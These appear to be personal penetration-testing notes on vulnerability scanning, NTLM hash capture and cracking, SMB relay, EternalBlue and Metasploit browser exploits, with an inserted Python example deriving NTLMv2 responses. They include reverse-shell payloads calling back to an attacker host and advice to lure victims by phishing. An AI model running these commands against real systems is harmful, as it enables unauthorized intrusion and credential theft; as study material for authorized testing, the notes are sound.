Exploitation/Vulnerability Assessment

Vulnerability Assessment

Generating a list of vulnerabilities present on all in-scope systems discovered.

Vulnerability Scanners
Only used when stealth is not a concern.

Utilize a database of known vulnerabilities to probe target daemons on TCP/UDP ports, configuration files, software suites, network devices and Windows registry entries.

Vulnerability scanners are very prone to false positives, so it's good to verify findings manually as well.

Scanners:

  1. OpenVAS
  2. Nexpose
  3. Nessus
  4. Nuclei

Nessus:
Server hosted on port 8834


Low Hanging Fruits

EyeWitness

Grabs screenshots of web applications, networking devices, and any devices using HTTP/HTTPS. It can also determine if default credentials are used.

https://github.com/FortyNorthSecurity/EyeWitness

python3 EyeWitness.py --headless --prepend-https -f <IPs/URLFile>

--active-scan attempts to log in with default credentials. Very loud; it will set off IDS.


Authentication Brute Forcing


Exploitation

LM/NTLMv1

  1. Client sends an authentication request
  2. Server sends an 8-byte random challenge
  3. Client encrypts challenge using the password hash and sends it back to the server

use auxiliary/server/capture/smb
set JOHNPWFILE hashpwd
run

After setting up Metasploit, we need to trick the users into starting a connection to our fake server.

If the LMHASH and NTHASH fields are the same, then only NT is being used. If they are different, LM is in use.

Crack the captured challenge-response hashes w/John:
john --format=netntlm <file>

NTLMv2

The only way to attack it is by brute-forcing the HMAC key.

Hash is bound to a particular server/username so they aren't reusable.

Hash can still be utilized in other attacks.
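As an added example (not part of these notes), the following Python walks through the public MS-NLMP derivation for NTLMv2 to show why a captured response is bound to one user, domain and server challenge, and encodes the LM/NT field check from the NTLMv1 section above. The NT hash, challenge and blob are constructed sample values, not real captures.

```python
"""NTLM challenge-response checks (added example; MS-NLMP derivation, constructed inputs)."""
import hashlib
import hmac


def lm_in_use(lm_response: bytes, nt_response: bytes) -> bool:
    """NTLMv1 check from the notes: identical LM and NT response fields mean the
    client only sent an NT response, i.e. LM is disabled on that client."""
    return lm_response != nt_response


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(NT hash, UPPER(user) + domain), strings as UTF-16LE.
    This is the 'HMAC key' a cracker must brute-force; it already mixes in the
    username and domain, so it differs per account even for one password."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_proof(nt_hash: bytes, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge + blob). The blob carries the
    timestamp, client nonce and server target info, so the response is also tied
    to one server and one authentication attempt (no offline reuse, only relay)."""
    key = ntowf_v2(nt_hash, user, domain)
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


# Constructed sample material: fake 16-byte NT hash, two 8-byte challenges, a minimal blob.
SAMPLE_NT_HASH = bytes.fromhex("00112233445566778899aabbccddeeff")
CHALLENGE_A = bytes.fromhex("0123456789abcdef")
CHALLENGE_B = bytes.fromhex("fedcba9876543210")
BLOB = bytes.fromhex("0101000000000000") + bytes(8) + bytes.fromhex("aabbccddeeff0011") + bytes(4)


def response_binding() -> dict:
    """Which inputs change the NTLMv2 response: user, domain and challenge all do."""
    base = ntlmv2_proof(SAMPLE_NT_HASH, "alice", "CORP", CHALLENGE_A, BLOB)
    return {
        "same_inputs_repeatable": base == ntlmv2_proof(SAMPLE_NT_HASH, "alice", "CORP", CHALLENGE_A, BLOB),
        "user_case_insensitive": base == ntlmv2_proof(SAMPLE_NT_HASH, "ALICE", "CORP", CHALLENGE_A, BLOB),
        "other_user_differs": base != ntlmv2_proof(SAMPLE_NT_HASH, "bob", "CORP", CHALLENGE_A, BLOB),
        "other_domain_differs": base != ntlmv2_proof(SAMPLE_NT_HASH, "alice", "LAB", CHALLENGE_A, BLOB),
        "other_challenge_differs": base != ntlmv2_proof(SAMPLE_NT_HASH, "alice", "CORP", CHALLENGE_B, BLOB),
    }


if __name__ == "__main__":
    for name, ok in response_binding().items():
        print(f"{name}: {ok}")
```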

SMB Relay Attack

Reusing authentication attempts to gain access to a network system.

https://www.blackhat.com/docs/us-15/materials/us-15-Brossard-SMBv2-Sharing-More-Than-Just-Your-Files-wp.pdf

smb_relay in Metasploit
Only works if the authenticating user has administrative privileges on a target

msfconsole
use exploit/windows/smb/smb_relay
set SHARE ADMIN$
set SMBHOST <SMBServer>
set LHOST <AttackerIP>
set LPORT <Port>


smbrelayx.py (part of Impacket)

Impacket: https://www.secureauth.com/labs/open-source-tools/impacket/

/usr/share/doc/python3-impacket/examples/

  1. Create meterpreter payload for Impacket to execute on the target:
     msfvenom -p windows/meterpreter/reverse_tcp LHOST=<AttackerIP> LPORT=<Port> -f exe -o <file.exe>
  2. Start a listener within msfconsole:
     use exploit/multi/handler
     set LHOST <AttackerIP>
     set LPORT <Port>
     run
  3. Start smbrelayx.py with the payload:
     python3 smbrelayx.py -h <TargetIP> -e <MsfvenomPayload>
  4. If the attack succeeds, you will gain a meterpreter session.


EternalBlue (MS17-010)

CVE-2017-0144

Affects Microsoft SMBv1 implementation

Module to check for vulnerability:
auxiliary/scanner/smb/smb_ms17_010

Module to run exploit:
exploit/windows/smb/ms17_010_eternalblue


Client-Side Exploitation with Metasploit

This module starts a webserver and hosts a webpage containing the exploit.

use exploit/multi/browser/firefox_pdfjs_privilege_escalation
set SRVHOST <AttackerIP>
set SRVPORT <Port>
set PAYLOAD firefox/shell_reverse_tcp
run

We now need to lure the victim to the webpage via phishing or social engineering.


Metasploit

search type:exploit platform:windows
search cve:<CVE-number>

info <exploit>

File Path to Modules in Kali:
/usr/share/metasploit-framework/modules/../..

On my computer:
/opt/metasploit-framework/embedded/framework/modules

List the targets an exploit module affects:
show targets

From a meterpreter session, execute a hidden command prompt to interact with:
execute -f cmd.exe -i -H
OR
shell

Meterpreter Post Exploitation Scripts:
run post/../../

run post/windows/gather/enum_services OR ps
run post/windows/gather/enum_applications
migrate <ProcessID>